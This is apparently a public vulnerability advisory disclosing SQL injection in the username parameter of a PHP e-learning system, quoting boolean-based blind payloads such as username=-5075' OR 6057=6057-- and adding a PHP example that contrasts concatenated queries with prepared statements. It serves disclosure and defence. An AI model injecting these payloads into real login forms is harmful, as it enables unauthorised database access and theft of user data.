Authored by nu11secur1ty

elearning-SES version 1.0 suffers from a remote SQL injection vulnerability.

## Title: elearning-SES (by: oretnom23) v1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 06.14.2023
## Vendor: https://github.com/oretnom23
## Software: https://github.com/oretnom23/php-elearning-system
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The username parameter appears to be vulnerable to SQL injection
attacks. The payloads 73152795' or 7515=7515-- and 13684562' or
3996=3998-- were each submitted in the username parameter. The first
appends a condition that is always true and the second a condition that
is always false, and the two requests resulted in different responses,
indicating that the input is being incorporated into a SQL query in an
unsafe way. An attacker can easily steal all information from the
database of this system.

STATUS: HIGH-CRITICAL Vulnerability

[+]Payload:
```mysql
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: username=-5075' OR 6057=6057-- JyxE&password=s8S!g3w!I2
---

```
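
The differential behaviour from the description, and the usual fix, as an added example (not code from this advisory or from the php-elearning-system project): a constructed username lookup built by string concatenation next to the same lookup with a bound parameter. The `users` table, its columns, the function names and the in-memory SQLite database standing in for MySQL are assumptions.

```php
<?php
// Added example: constructed stand-in for a login lookup, not the project's code.
// Assumptions: table "users", column "username", SQLite in memory instead of MySQL.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)");
$db->prepare("INSERT INTO users (username) VALUES (?)")->execute(['admin']);

// Unsafe: the username is concatenated into the SQL text, so a single quote
// closes the string literal and the remainder of the input is parsed as SQL.
function lookup_concatenated(PDO $db, string $username): int
{
    $sql = "SELECT id FROM users WHERE username = '" . $username . "'";
    return count($db->query($sql)->fetchAll());
}

// Hardened: the SQL text is fixed at prepare time; the username is sent as a
// bound value and is only ever compared against the column as data.
function lookup_prepared(PDO $db, string $username): int
{
    $stmt = $db->prepare("SELECT id FROM users WHERE username = ?");
    $stmt->execute([$username]);
    return count($stmt->fetchAll());
}

// The two probe values quoted in the description: one true, one false condition.
$probes = [
    "73152795' or 7515=7515--",
    "13684562' or 3996=3998--",
];

foreach ($probes as $probe) {
    // Differing row counts between the two probes mean the input reached the
    // SQL parser; identical counts mean it was treated as a plain string.
    printf(
        "%-28s concatenated=%d prepared=%d\n",
        $probe,
        lookup_concatenated($db, $probe),
        lookup_prepared($db, $probe)
    );
}
```

The concatenated lookup returns a different row count for each probe, which is the response difference the description reports; the prepared lookup returns the same count for both because neither string matches a stored username.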

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/elearning_1)

## Proof and Exploit:
[href]()

## Time spent:
01:15:00